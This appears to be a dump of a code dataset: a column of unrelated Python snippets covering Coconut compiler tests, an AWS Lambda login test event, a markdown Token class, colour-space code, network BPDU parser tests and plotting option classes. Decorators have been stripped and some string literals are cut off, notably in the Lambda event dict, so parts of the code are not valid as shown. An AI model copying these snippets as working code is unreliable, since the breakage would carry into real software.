code stringlengths 281 23.7M |
|---|
_test_func_names
class TestShell(unittest.TestCase):
def test_version(self):
call(['coconut', '--version'])
def test_code(self):
call(['coconut', '-s', '-c', coconut_snip], assert_output=True)
if (not PY2):
def test_target_3_snip(self):
call(['coconut', '-t3', '-c', target_3_snip], assert_output=True)
if MYPY:
def test_universal_mypy_snip(self):
call(['coconut', '-c', mypy_snip, '--mypy'], assert_output=mypy_snip_err_3, check_errors=False, check_mypy=False)
def test_sys_mypy_snip(self):
call(['coconut', '--target', 'sys', '-c', mypy_snip, '--mypy'], assert_output=mypy_snip_err_3, check_errors=False, check_mypy=False)
def test_no_wrap_mypy_snip(self):
call(['coconut', '--target', 'sys', '--no-wrap', '-c', mypy_snip, '--mypy'], assert_output=mypy_snip_err_3, check_errors=False, check_mypy=False)
def test_pipe(self):
call((('echo ' + escape(coconut_snip)) + '| coconut -s'), shell=True, assert_output=True)
def test_api(self):
call_python(['-c', (('from coconut.api import parse; exec(parse("' + coconut_snip) + '"))')], assert_output=True)
def test_import_hook(self):
with using_sys_path(src):
with using_paths(runnable_compiled_loc, importable_compiled_loc):
with using_coconut():
auto_compilation(True)
import runnable
reload(runnable)
assert (runnable.success == '<success>')
def test_find_packages(self):
with using_pys_in(agnostic_dir):
with using_coconut():
from coconut.api import find_packages, find_and_compile_packages
assert (find_packages(cocotest_dir) == ['agnostic'])
assert (find_and_compile_packages(cocotest_dir) == ['agnostic'])
def test_runnable(self):
run_runnable()
def test_runnable_nowrite(self):
run_runnable(['-n'])
def test_compile_runnable(self):
with using_paths(runnable_py, importable_py):
comp_runnable()
call_python([runnable_py, '--arg'], assert_output=True)
def test_import_runnable(self):
with using_paths(runnable_py, importable_py):
comp_runnable()
for _ in range(2):
call_python([runnable_py, '--arg'], assert_output=True, convert_to_import=True)
if ((not WINDOWS) and XONSH):
def test_xontrib(self):
p = spawn_cmd('xonsh')
p.expect('$')
p.sendline('xontrib load coconut')
p.expect('$')
p.sendline('!(ls -la) |> bool')
p.expect('True')
p.sendline("'1; 2' |> print")
p.expect('1; 2')
p.sendline('$ENV_VAR = "ABC"')
p.expect('$')
p.sendline('echo f"{$ENV_VAR}"; echo f"{$ENV_VAR}"')
p.expect('ABC')
p.expect('ABC')
p.sendline('len("""1\n3\n5""")\n')
p.expect('5')
if ((not PYPY) or PY39):
if PY36:
p.sendline('echo 123;; 123')
p.expect('123;; 123')
p.sendline('echo abc; echo abc')
p.expect('abc')
p.expect('abc')
p.sendline('echo abc; print(1 |> (.+1))')
p.expect('abc')
p.expect('2')
p.sendline('execx("10 |> print")')
p.expect('subprocess mode')
p.sendline('xontrib unload coconut')
p.expect('$')
if (((not PYPY) or PY39) and PY36):
p.sendline('1 |> print')
p.expect('subprocess mode')
p.sendeof()
if p.isalive():
p.terminate()
if (IPY and ((not WINDOWS) or PY35)):
def test_ipython_extension(self):
call(['ipython', '--ext', 'coconut', '-c', ('%coconut ' + coconut_snip)], assert_output=((True,) + (('Jupyter error',) if WINDOWS else ())), stderr_first=WINDOWS, check_errors=(not WINDOWS), expect_retcode=(0 if (not WINDOWS) else None))
def test_kernel_installation(self):
call(['coconut', '--jupyter'], assert_output=kernel_installation_msg)
(stdout, stderr, retcode) = call_output(['jupyter', 'kernelspec', 'list'])
if (not stdout):
(stdout, stderr) = (stderr, '')
assert ((not retcode) and (not stderr)), stderr
for kernel in ((icoconut_custom_kernel_name,) + icoconut_default_kernel_names):
assert (kernel in stdout)
if ((not WINDOWS) and (not PYPY)):
def test_jupyter_console(self):
p = spawn_cmd('coconut --jupyter console')
p.expect('In', timeout=jupyter_timeout)
p.sendline('%load_ext coconut')
p.expect('In', timeout=jupyter_timeout)
p.sendline('`exit`')
if (sys.version_info[:2] != (3, 6)):
p.expect('Shutting down kernel|shutting down', timeout=jupyter_timeout)
if p.isalive():
p.terminate() |
class PelotonWorkoutMetrics(PelotonObject):
def __init__(self, **kwargs):
self.workout_duration = kwargs.get('duration')
self.fitness_discipline = kwargs.get('segment_list')[0]['metrics_type']
metric_summaries = ['total_output', 'distance', 'calories']
for metric in kwargs.get('summaries'):
if (metric['slug'] not in metric_summaries):
continue
attr_name = (metric['slug'] + '_summary')
if (metric['slug'] == 'total_output'):
attr_name = 'output_summary'
setattr(self, attr_name, PelotonMetricSummary(**metric))
metric_categories = ['output', 'cadence', 'resistance', 'speed', 'heart_rate']
for metric in kwargs.get('metrics'):
if (metric['slug'] not in metric_categories):
continue
setattr(self, metric['slug'], PelotonMetric(**metric))
def __str__(self):
return self.fitness_discipline |
class SetLastLoginTest(unittest.TestCase):
('set_last_login.app.update_last_login', side_effect=mocked_update_last_login)
def test_build(self, update_last_login_mock):
response = lambda_handler(self.update_login_event(), '')
self.assertEqual(update_last_login_mock.call_count, 1)
def update_login_event(self):
return {'resource': '/update_login', 'path': '/update_login', 'body': '', ' 'POST', 'headers': {'Accept': 'application/json, text/plain, */*', 'accept-encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5', 'Authorization': 'eyJraWQiOiJq1231235fOwKv46JpjurGKzvma17eqCoaw', 'CloudFront-Forwarded-Proto': ' 'CloudFront-Is-Desktop-Viewer': 'true', 'CloudFront-Is-Mobile-Viewer': 'false', 'CloudFront-Is-SmartTV-Viewer': 'false', 'CloudFront-Is-Tablet-Viewer': 'false', 'CloudFront-Viewer-Country': 'IE', 'Host': 'api.haohaotiantian.com', 'origin': ' 'Referer': ' 'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', 'sec-ch-ua-mobile': '?0', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'cross-site', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'Via': '2.0 f8591238.cloudfront.net (CloudFront)', 'X-Amz-Cf-Id': 'rex4fmbUq5pvK123fj5bGvpw==', 'X-Amzn-Trace-Id': 'Root=1-60e123b7e7b70', 'X-Forwarded-For': '123', 'X-Forwarded-Port': '123', 'X-Forwarded-Proto': ' 'multiValueHeaders': {'Accept': ['application/json, text/plain, */*'], 'accept-encoding': ['gzip, deflate, br'], 'Accept-Language': ['en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5'], 'Authorization': ['eyJraWQiOiJqVmhFdEN4Y123vZ25pdG123GKzvma17eqCoaw'], 'CloudFront-Forwarded-Proto': [' 'CloudFront-Is-Desktop-Viewer': ['true'], 'CloudFront-Is-Mobile-Viewer': ['false'], 'CloudFront-Is-SmartTV-Viewer': ['false'], 'CloudFront-Is-Tablet-Viewer': ['false'], 'CloudFront-Viewer-Country': ['IE'], 'Host': ['api.haohaotiantian.com'], 'origin': [' 'Referer': [' 'sec-ch-ua': ['" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"'], 'sec-ch-ua-mobile': ['?0'], 'sec-fetch-dest': ['empty'], 'sec-fetch-mode': ['cors'], 'sec-fetch-site': ['cross-site'], 'User-Agent': ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'], 'Via': ['2.0 123.cloudfront.net (CloudFront)'], 'X-Amz-Cf-Id': ['rex4fmbU123BVnGAOV9sfj5bGvpw=='], 'X-Amzn-Trace-Id': ['Root=1-60e6d123b70'], 'X-Forwarded-For': ['123'], 'X-Forwarded-Port': ['443'], 'X-Forwarded-Proto': [' 'queryStringParameters': 'None', 'multiValueQueryStringParameters': 'None', 'pathParameters': 'None', 'stageVariables': 'None', 'requestContext': {'resourceId': '123', 'authorizer': {'claims': {'sub': '', 'aud': '123123', 'email_verified': 'true', 'event_id': 'cc6a7b68-e1bc-417b-9344-123', 'token_use': 'id', 'auth_time': '', 'iss': ' 'cognito:username': '', 'exp': 'Thu Jul 08 11:38:59 UTC 2021', 'iat': 'Thu Jul 08 10:38:59 UTC 2021', 'email': ''}}, 'resourcePath': '/update_login', ' 'GET', 'extendedRequestId': 'CJZWoF123FT_Q=', 'requestTime': '08/Jul/2021:10:38:59 +0000', 'path': '/update_login', 'accountId': '123', 'protocol': 'HTTP/1.1', 'stage': 'Prod', 'domainPrefix': 'api', 'requestTimeEpoch': 123, 'requestId': '11875c1237fec0aab', 'identity': {'cognitoIdentityPoolId': 'None', 'accountId': 'None', 'cognitoIdentityId': 'None', 'caller': 'None', 'sourceIp': '54', 'principalOrgId': 'None', 'accessKey': 'None', 'cognitoAuthenticationType': 'None', 'cognitoAuthenticationProvider': 'None', 'userArn': 'None', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'user': 'None'}, 'domainName': 'api.haohaotiantian.com', 'apiId': '123'}, 'isBase64Encoded': False}
if (__name__ == '__main__'):
unittest.main() |
.integration
class TestCheckResponseAuth():
def test_check_response_auth_sys_exit(self) -> None:
response = requests.get('/api/v1/cryptography/encryption/key')
with pytest.raises(SystemExit):
common_utils.check_response_auth(response)
def test_check_response_auth_ok(self) -> None:
response = requests.get('/health')
assert common_utils.check_response_auth(response) |
def downgrade():
op.drop_constraint('uq_ugr_user_group_role', 'users_groups_roles', type_='unique')
op.drop_constraint('uq_ugr_email_group_role', 'users_groups_roles', type_='unique')
op.create_unique_constraint('uq_uer_user_group_role', 'users_groups_roles', ['user_id', 'group_id', 'role_id']) |
class _TestSegmentPen(AbstractPen):
def __init__(self):
self._commands = []
def __repr__(self):
return ' '.join(self._commands)
def moveTo(self, pt):
self._commands.append(('%s %s moveto' % (pt[0], pt[1])))
def lineTo(self, pt):
self._commands.append(('%s %s lineto' % (pt[0], pt[1])))
def curveTo(self, *pts):
pts = [('%s %s' % pt) for pt in pts]
self._commands.append(('%s curveto' % ' '.join(pts)))
def qCurveTo(self, *pts):
pts = [(('%s %s' % pt) if (pt is not None) else 'None') for pt in pts]
self._commands.append(('%s qcurveto' % ' '.join(pts)))
def closePath(self):
self._commands.append('closepath')
def endPath(self):
self._commands.append('endpath')
def addComponent(self, glyphName, transformation):
self._commands.append(("'%s' %s addcomponent" % (glyphName, transformation))) |
(**DATACLASS_KWARGS)
class Token():
type: str
tag: str
nesting: Literal[((- 1), 0, 1)]
attrs: dict[(str, ((str | int) | float))] = dc.field(default_factory=dict)
map: (list[int] | None) = None
level: int = 0
children: (list[Token] | None) = None
content: str = ''
markup: str = ''
info: str = ''
meta: dict[(Any, Any)] = dc.field(default_factory=dict)
block: bool = False
hidden: bool = False
def __post_init__(self) -> None:
self.attrs = convert_attrs(self.attrs)
def attrIndex(self, name: str) -> int:
warnings.warn('Token.attrIndex should not be used, since Token.attrs is a dictionary', UserWarning)
if (name not in self.attrs):
return (- 1)
return list(self.attrs.keys()).index(name)
def attrItems(self) -> list[tuple[(str, ((str | int) | float))]]:
return list(self.attrs.items())
def attrPush(self, attrData: tuple[(str, ((str | int) | float))]) -> None:
(name, value) = attrData
self.attrSet(name, value)
def attrSet(self, name: str, value: ((str | int) | float)) -> None:
self.attrs[name] = value
def attrGet(self, name: str) -> (((None | str) | int) | float):
return self.attrs.get(name, None)
def attrJoin(self, name: str, value: str) -> None:
if (name in self.attrs):
current = self.attrs[name]
if (not isinstance(current, str)):
raise TypeError(f"existing attr 'name' is not a str: {self.attrs[name]}")
self.attrs[name] = f'{current} {value}'
else:
self.attrs[name] = value
def copy(self, **changes: Any) -> Token:
return dc.replace(self, **changes)
def as_dict(self, *, children: bool=True, as_upstream: bool=True, meta_serializer: (Callable[([dict[(Any, Any)]], Any)] | None)=None, filter: (Callable[([str, Any], bool)] | None)=None, dict_factory: Callable[(..., MutableMapping[(str, Any)])]=dict) -> MutableMapping[(str, Any)]:
mapping = dict_factory(((f.name, getattr(self, f.name)) for f in dc.fields(self)))
if filter:
mapping = dict_factory(((k, v) for (k, v) in mapping.items() if filter(k, v)))
if (as_upstream and ('attrs' in mapping)):
mapping['attrs'] = (None if (not mapping['attrs']) else [[k, v] for (k, v) in mapping['attrs'].items()])
if (meta_serializer and ('meta' in mapping)):
mapping['meta'] = meta_serializer(mapping['meta'])
if (children and mapping.get('children', None)):
mapping['children'] = [child.as_dict(children=children, filter=filter, dict_factory=dict_factory, as_upstream=as_upstream, meta_serializer=meta_serializer) for child in mapping['children']]
return mapping
def from_dict(cls, dct: MutableMapping[(str, Any)]) -> Token:
token = cls(**dct)
if token.children:
token.children = [cls.from_dict(c) for c in token.children]
return token |
class JzCzhz(LCh):
BASE = 'jzazbz'
NAME = 'jzczhz'
SERIALIZE = ('--jzczhz',)
WHITE = WHITES['2deg']['D65']
DYNAMIC_RANGE = 'hdr'
CHANNEL_ALIASES = {'lightness': 'jz', 'chroma': 'cz', 'hue': 'hz', 'h': 'hz', 'c': 'cz', 'j': 'jz'}
ACHROMATIC = Jzazbz.ACHROMATIC
CHANNELS = (Channel('jz', 0.0, 1.0), Channel('cz', 0.0, 0.5), Channel('hz', 0.0, 360.0, flags=FLG_ANGLE, nans=ACHROMATIC.hue))
def resolve_channel(self, index: int, coords: Vector) -> float:
jz = coords[0]
if (jz < 0):
jz = 0.0
if (index == 2):
h = coords[2]
return (self.ACHROMATIC.get_ideal_hue(jz, coords[1]) if math.isnan(h) else h)
elif (index == 1):
c = coords[1]
return (self.ACHROMATIC.get_ideal_chroma(jz) if math.isnan(c) else c)
value = coords[index]
return (self.channels[index].nans if math.isnan(value) else value)
def is_achromatic(self, coords: Vector) -> bool:
if (coords[0] < 0.0):
return True
return self.ACHROMATIC.test(*self.normalize(coords))
def hue_name(self) -> str:
return 'hz' |
class Test_UnknownType(unittest.TestCase):
def setUp(self):
self.protocol_id = bpdu.PROTOCOL_IDENTIFIER
self.version_id = bpdu.RstBPDUs.VERSION_ID
self.bpdu_type = 222
self.flags = 126
self.root_priority = 4096
self.root_system_id_extension = 1
self.root_mac_address = '12:34:56:78:9a:bc'
self.root_path_cost = 2
self.bridge_priority = 8192
self.bridge_system_id_extension = 3
self.bridge_mac_address = 'aa:aa:aa:aa:aa:aa'
self.port_priority = 16
self.port_number = 4
self.message_age = 5
self.max_age = 6
self.hello_time = 7
self.forward_delay = 8
self.version_1_length = bpdu.VERSION_1_LENGTH
self.fmt = ((bpdu.bpdu._PACK_STR + bpdu.ConfigurationBPDUs._PACK_STR[1:]) + bpdu.RstBPDUs._PACK_STR[1:])
self.buf = struct.pack(self.fmt, self.protocol_id, self.version_id, self.bpdu_type, self.flags, bpdu.RstBPDUs.encode_bridge_id(self.root_priority, self.root_system_id_extension, self.root_mac_address), self.root_path_cost, bpdu.RstBPDUs.encode_bridge_id(self.bridge_priority, self.bridge_system_id_extension, self.bridge_mac_address), bpdu.RstBPDUs.encode_port_id(self.port_priority, self.port_number), bpdu.RstBPDUs._encode_timer(self.message_age), bpdu.RstBPDUs._encode_timer(self.max_age), bpdu.RstBPDUs._encode_timer(self.hello_time), bpdu.RstBPDUs._encode_timer(self.forward_delay), self.version_1_length)
def test_parser(self):
(r1, r2, _) = bpdu.bpdu.parser(self.buf)
eq_(r1, self.buf)
eq_(r2, None) |
def test_resolve_unresolved_reaching_conditions():
asforest = AbstractSyntaxForest(condition_handler=ConditionHandler())
code_node_1 = asforest.add_code_node([Assignment(var('u'), const(9))])
code_node_1.reaching_condition = LogicCondition.initialize_symbol('R2', asforest.factory.logic_context)
code_node_2 = asforest.add_code_node([Break()])
code_node_3 = asforest.add_code_node([Assignment(var('v'), const(9)), Break()])
code_node_3.reaching_condition = LogicCondition.initialize_symbol('R3', asforest.factory.logic_context)
condition_node = asforest._add_condition_node_with(LogicCondition.initialize_symbol('a', asforest.factory.logic_context), code_node_2, code_node_3)
seq_node = SeqNode(LogicCondition.initialize_symbol('R1', asforest.factory.logic_context))
asforest._add_node(seq_node)
asforest._add_edges_from(((seq_node, code_node_1), (seq_node, condition_node)))
asforest._code_node_reachability_graph.add_reachability_from(((code_node_1, code_node_3), (code_node_1, code_node_2)))
seq_node.sort_children()
asforest.resolve_unresolved_reaching_conditions()
resulting_asforest = AbstractSyntaxForest(condition_handler=ConditionHandler())
code_node_1 = resulting_asforest.add_code_node([Assignment(var('u'), const(9))])
code_node_2 = resulting_asforest.add_code_node([Break()])
code_node_3 = resulting_asforest.add_code_node([Assignment(var('v'), const(9)), Break()])
seq_node = asforest.factory.create_seq_node()
resulting_asforest._add_node(seq_node)
condition_node_r1 = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('R1', asforest.factory.logic_context), seq_node)
condition_node_r2 = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('R2', asforest.factory.logic_context), code_node_1)
condition_node_r3 = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('R3', asforest.factory.logic_context), code_node_3)
condition_node = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('a', asforest.factory.logic_context), code_node_2, condition_node_r3)
resulting_asforest._add_edges_from(((seq_node, condition_node_r2), (seq_node, condition_node)))
resulting_asforest._code_node_reachability_graph.add_reachability_from(((code_node_1, code_node_3), (code_node_1, code_node_2)))
seq_node.sort_children()
assert ((len(asforest.get_roots) == 2) and any(((root == condition_node_r1) for root in asforest.get_roots)) and ASTComparator.compare(asforest, resulting_asforest)) |
def get_signatures_from_comments(comments):
comments = comments.replace('#', '').replace('\n', '')
signatures_tmp = [sig.split('->', 1)[0].strip() for sig in comments.split('transonic block')[1:]]
signatures = []
for sig in signatures_tmp:
if sig.startswith('('):
sig = sig[1:find_index_closing_parenthesis(sig)]
signatures.append(sig)
signatures_tmp = signatures
signatures = []
for sig_str in signatures_tmp:
signature = {}
type_vars_strs = [tmp.strip() for tmp in sig_str.split(';')]
type_vars_strs = [tmp for tmp in type_vars_strs if tmp]
for type_vars_str in type_vars_strs:
(type_as_str, vars_str) = type_vars_str.strip().split(' ', 1)
for var_str in vars_str.split(','):
var_str = var_str.strip()
signature[var_str] = type_as_str
signatures.append(signature)
return signatures |
class OptionPlotoptionsHeatmapSonificationDefaultinstrumentoptionsMappingGapbetweennotes(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesHeatmapSonificationContexttracksMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class ActionRecordWorker(ParallelRolloutWorker):
def run(env_config: DictConfig, wrapper_config: DictConfig, agent_config: DictConfig, deterministic: bool, max_episode_steps: int, record_trajectory: bool, input_directory: str, reporting_queue: Queue, seeding_queue: Queue) -> None:
(env_seed, agent_seed) = (None, None)
try:
(env, agent) = RolloutRunner.init_env_and_agent(env_config, wrapper_config, max_episode_steps, agent_config, input_directory)
assert isinstance(agent, ReplayRecordedActionsPolicy)
if (not isinstance(env, SpacesRecordingWrapper)):
BColors.print_colored('Adding SpacesRecordingWrapper on top of wrapper stack!', color=BColors.WARNING)
env = SpacesRecordingWrapper.wrap(env)
(env, episode_recorder) = ParallelRolloutWorker._setup_monitoring(env, record_trajectory)
first_episode = True
while True:
if seeding_queue.empty():
if first_episode:
break
try:
env.reset()
agent.reset()
except Exception as e:
logger.warning(f'''
Exception in event collection reset() encountered: {e}
{traceback.format_exc()}''')
reporting_queue.put(episode_recorder.get_last_episode_data())
break
action_record_path = seeding_queue.get()
agent.load_action_record(action_record_path)
env_seed = agent.action_record.seed
env.seed(env_seed)
try:
obs = env.reset()
agent.reset()
RolloutRunner.run_episode(env=env, agent=agent, obs=obs, deterministic=deterministic, render=False)
out_txt = f'agent_seed: {agent_seed} | {str((env.core_env if isinstance(env, MazeEnv) else env))}'
logger.info(out_txt)
except Exception as e:
out_txt = f'''agent_seed: {agent_seed} | {str((env.core_env if isinstance(env, MazeEnv) else env))}
Exception encountered: {e}
{traceback.format_exc()}'''
logger.warning(out_txt)
finally:
if (not first_episode):
reporting_queue.put(episode_recorder.get_last_episode_data())
first_episode = False
except Exception as exception:
exception_report = ExceptionReport(exception, traceback.format_exc(), env_seed, agent_seed)
reporting_queue.put(exception_report)
raise |
def create_index_string(matview_name, index_name, idx):
if idx.get('cluster_on_this', False):
global CLUSTERING_INDEX
CLUSTERING_INDEX = index_name
idx_method = idx.get('method', 'BTREE')
idx_unique = ('UNIQUE ' if idx.get('unique', False) else '')
idx_where = ((' WHERE ' + idx['where']) if idx.get('where', None) else '')
idx_with = ''
if (idx_method.upper() == 'BTREE'):
idx_with = ' WITH (fillfactor = 97)'
idx_cols = []
for col in idx['columns']:
index_def = [col['name']]
if col.get('order', None):
index_def.append(col['order'])
if col.get('collation', None):
index_def.append(('COLLATE ' + col['collation']))
if col.get('opclass', None):
index_def.append(col['opclass'])
idx_cols.append(' '.join(index_def))
idx_str = TEMPLATE['create_index'].format(idx_unique, index_name, matview_name, idx_method, ', '.join(idx_cols), idx_with, idx_where)
return idx_str |
class NevergradSweeper(Sweeper):
def __init__(self, optim: OptimConf, parametrization: Optional[DictConfig]):
from ._impl import NevergradSweeperImpl
self.sweeper = NevergradSweeperImpl(optim, parametrization)
def setup(self, *, hydra_context: HydraContext, task_function: TaskFunction, config: DictConfig) -> None:
return self.sweeper.setup(hydra_context=hydra_context, task_function=task_function, config=config)
def sweep(self, arguments: List[str]) -> None:
return self.sweeper.sweep(arguments) |
def drop_columns(records, slices):
for record in records:
drop = set((i for slice in slices for i in range(*slice.indices(len(record)))))
keep = [(i not in drop) for i in range(len(record))]
record.seq = Seq(''.join(itertools.compress(record.seq, keep)))
(yield record) |
def extractBarrykaizerBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def make_request_args(tasks):
prompts = [t['prompt'] for t in tasks]
futures = [t['future'] for t in tasks]
request_ids = [t['request_id'] for t in tasks]
api_configs = [t.get('api_config', None) for t in tasks if (t.get('api_config') is not None)]
api_config = (api_configs[0] if (len(api_configs) > 0) else None)
timeouts = [t.get('timeout', None) for t in tasks if (t.get('timeout') is not None)]
timeout = (max(timeouts) if (len(timeouts) > 0) else None)
request_args = tasks[0].copy()
del request_args['future']
request_args['prompt'] = prompts
request_args['futures'] = futures
request_args['request_id'] = request_ids
request_args['stream'] = True
request_args['timeout'] = timeout
if (api_config is not None):
request_args['api_config'] = api_config
return request_args |
def test_oidcclient_has_cookie(client):
client.client.cookies.clear()
assert (client.has_cookie('foo') is False)
client.client.cookies.set('foo', 'bar', domain='localhost.local')
assert (client.has_cookie('foo') is True)
assert (client.has_cookie('foo', domain='localhost') is True)
assert (client.has_cookie('foo', domain='example.com') is False) |
class Preferences(GObject.Object, PeasGtk.Configurable):
__gtype_name__ = 'AlternativeToolbarPreferences'
object = GObject.property(type=GObject.Object)
def __init__(self):
GObject.Object.__init__(self)
self.gs = GSetting()
self.plugin_settings = self.gs.get_setting(self.gs.Path.PLUGIN)
def do_create_configure_widget(self):
print('DEBUG - create_display_contents')
self._first_run = True
cl = CoverLocale()
cl.switch_locale(cl.Locale.LOCALE_DOMAIN)
builder = Gtk.Builder()
builder.set_translation_domain(cl.Locale.LOCALE_DOMAIN)
builder.add_from_file(rb.find_plugin_file(self, 'ui/altpreferences.ui'))
builder.connect_signals(self)
start_hidden = builder.get_object('start_hidden_checkbox')
start_hidden.set_active((not self.plugin_settings[self.gs.PluginKey.START_HIDDEN]))
start_hidden.connect('toggled', self._start_hidden_checkbox_toggled)
self._show_compact = builder.get_object('show_compact_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.SHOW_COMPACT, self._show_compact, 'active', Gio.SettingsBindFlags.DEFAULT)
self._show_compact.connect('toggled', self._show_compact_checkbox_toggled)
self._compact_pos = builder.get_object('compact_pos_combobox')
self.plugin_settings.bind(self.gs.PluginKey.COMPACT_POS, self._compact_pos, 'active', Gio.SettingsBindFlags.DEFAULT)
self._playing_label = builder.get_object('playing_label_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.PLAYING_LABEL, self._playing_label, 'active', Gio.SettingsBindFlags.DEFAULT)
self._inline_label = builder.get_object('inline_label_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.INLINE_LABEL, self._inline_label, 'active', Gio.SettingsBindFlags.DEFAULT)
volume_control = builder.get_object('volume_control_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.VOLUME_CONTROL, volume_control, 'active', Gio.SettingsBindFlags.DEFAULT)
self._enhanced_sidebar = builder.get_object('enhanced_sidebar_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.ENHANCED_SIDEBAR, self._enhanced_sidebar, 'active', Gio.SettingsBindFlags.DEFAULT)
self._show_tooltips = builder.get_object('tooltips_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.SHOW_TOOLTIPS, self._show_tooltips, 'active', Gio.SettingsBindFlags.DEFAULT)
self._dark_theme = builder.get_object('dark_theme_checkbox')
self.plugin_settings.bind(self.gs.PluginKey.DARK_THEME, self._dark_theme, 'active', Gio.SettingsBindFlags.DEFAULT)
modern_switch = builder.get_object('modern_switch')
modern_switch.connect('notify', self._modern_switch_state)
default = Gtk.Settings.get_default()
display_type = self.plugin_settings[self.gs.PluginKey.DISPLAY_TYPE]
if (display_type == 0):
if ((not default.props.gtk_shell_shows_app_menu) or default.props.gtk_shell_shows_menubar):
modern_switch.set_active(False)
else:
modern_switch.set_active(True)
elif (display_type == 1):
modern_switch.set_active(True)
else:
modern_switch.set_active(False)
if modern_switch.get_active():
self._show_compact.set_active(True)
self._show_compact_checkbox_toggled(self._show_compact)
infobar = builder.get_object('infobar')
button = infobar.add_button(_('Restart'), 1)
button.connect('clicked', self._restart_button_clicked)
self._category_pos = builder.get_object('category_combobox')
self.plugin_settings.bind(self.gs.PluginKey.HORIZ_CATEGORIES, self._category_pos, 'active', Gio.SettingsBindFlags.DEFAULT)
self._first_run = False
return builder.get_object('preferences_box')
def _restart_button_clicked(self, *args):
exepath = shutil.which('rhythmbox')
os.execl(exepath, exepath, *sys.argv)
def _start_hidden_checkbox_toggled(self, toggle_button):
self.plugin_settings[self.gs.PluginKey.START_HIDDEN] = (not toggle_button.get_active())
def _show_compact_checkbox_toggled(self, toggle_button):
enabled = toggle_button.get_active()
self._show_tooltips.set_sensitive(enabled)
self._inline_label.set_sensitive(enabled)
self._playing_label.set_sensitive(enabled)
def _modern_switch_state(self, switch, param):
state = switch.get_active()
self._show_compact.set_sensitive((not state))
self._compact_pos.set_sensitive((not state))
if state:
self._show_compact.set_active(True)
self.plugin_settings[self.gs.PluginKey.DISPLAY_TYPE] = 1
else:
self.plugin_settings[self.gs.PluginKey.DISPLAY_TYPE] = 2 |
class IamPolicy(object):
def __init__(self):
self.audit_configs = None
self.bindings = []
def create_from(cls, policy_json):
policy = cls()
if (not policy_json):
raise errors.InvalidIamPolicyError('Invalid policy {}'.format(policy_json))
policy.bindings = [IamPolicyBinding.create_from(b) for b in policy_json.get('bindings', [])]
if ('auditConfigs' in policy_json):
policy.audit_configs = IamAuditConfig.create_from(policy_json.get('auditConfigs'))
return policy
def __eq__(self, other):
if (not isinstance(other, type(self))):
return NotImplemented
return ((self.bindings == other.bindings) and (self.audit_configs == other.audit_configs))
def __ne__(self, other):
return (not (self == other))
def __repr__(self):
if self.audit_configs:
return 'IamPolicy: <bindings={}, audit_configs={}>'.format(self.bindings, self.audit_configs)
return 'IamPolicy: <bindings={}>'.format(self.bindings)
def is_empty(self):
return (not bool(self.bindings)) |
def test_extruded_ope_hits_cache():
m = UnitSquareMesh(1, 1)
e = ExtrudedMesh(m, 2, layer_height=1)
U0 = FiniteElement('DG', 'triangle', 0)
U1 = FiniteElement('CG', 'interval', 2)
W0 = TensorProductElement(U0, U1)
W1 = FunctionSpace(e, HDiv(W0))
U0 = FiniteElement('DG', 'triangle', 0)
U1 = FiniteElement('CG', 'interval', 2)
W0 = TensorProductElement(U0, U1)
W2 = FunctionSpace(e, HDiv(W0))
assert (W1 == W2)
assert (W1.topological == W2.topological)
assert (W1._shared_data == W2._shared_data) |
class OptionPlotoptionsPyramidSonificationContexttracksMappingHighpassResonance(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def test_is_valid_quarter():
assert (fyh.is_valid_quarter(1) is True)
